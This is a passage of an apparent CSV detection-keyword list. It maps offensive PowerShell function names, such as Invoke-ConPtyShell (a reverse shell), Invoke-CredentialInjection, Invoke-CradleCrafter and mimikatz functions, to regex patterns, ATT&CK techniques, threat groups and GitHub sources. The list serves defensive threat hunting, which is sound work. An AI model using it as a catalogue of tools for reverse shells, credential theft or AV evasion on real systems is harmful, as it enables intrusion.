"*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","N/A","10","10","67","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z","48898"
"*Invoke-CheckLocalAdminAccess*",".{0,1000}Invoke\-CheckLocalAdminAccess.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48899"
"*invoke-checklocaladminaccess*",".{0,1000}invoke\-checklocaladminaccess.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","N/A","10","974","121","2025-03-17T14:04:51Z","2016-07-06T13:25:09Z","48900"
"*Invoke-ClearScript*",".{0,1000}Invoke\-ClearScript.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48901"
"*Invoke-ClearScript.ps1*",".{0,1000}Invoke\-ClearScript\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48902"
"*Invoke-CleverSpray*",".{0,1000}Invoke\-CleverSpray.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","0","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","48903"
"*Invoke-CleverSpray.ps1*",".{0,1000}Invoke\-CleverSpray\.ps1.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","N/A","10","1","65","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z","48904"
"*Invoke-ClipboardMonitor*",".{0,1000}Invoke\-ClipboardMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48905"
"*Invoke-CMLootDownload*",".{0,1000}Invoke\-CMLootDownload.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48906"
"*Invoke-CMLootExtract*",".{0,1000}Invoke\-CMLootExtract.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48907"
"*Invoke-CMLootHunt *",".{0,1000}Invoke\-CMLootHunt\s.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","0","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48908"
"*Invoke-CMLootInventory*",".{0,1000}Invoke\-CMLootInventory.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","N/A","8","2","175","22","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z","48909"
"*Invoke-ConPtyShell *",".{0,1000}Invoke\-ConPtyShell\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","48910"
"*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","48911"
"*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","48912"
"*Invoke-ConPtyShell*",".{0,1000}Invoke\-ConPtyShell.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","48913"
"*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","48914"
"*Invoke-ConPtyShell.ps1*",".{0,1000}Invoke\-ConPtyShell\.ps1.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","48915"
"*Invoke-CopyFile*",".{0,1000}Invoke\-CopyFile.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48916"
"*Invoke-CradleCrafter *",".{0,1000}Invoke\-CradleCrafter\s.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","48917"
"*Invoke-CreateRemoteThread*",".{0,1000}Invoke\-CreateRemoteThread.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48918"
"*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","48919"
"*Invoke-CredentialFilesCheck*",".{0,1000}Invoke\-CredentialFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48920"
"*Invoke-CredentialGuardCheck*",".{0,1000}Invoke\-CredentialGuardCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","48921"
"*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48922"
"*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48923"
"*Invoke-CredentialInjection*",".{0,1000}Invoke\-CredentialInjection.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48924"
"*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48925"
"*Invoke-CredentialInjection.ps1*",".{0,1000}Invoke\-CredentialInjection\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48926"
"*Invoke-CredentialPhisher*",".{0,1000}Invoke\-CredentialPhisher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48927"
"*Invoke-CredentialPhisher*",".{0,1000}Invoke\-CredentialPhisher.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 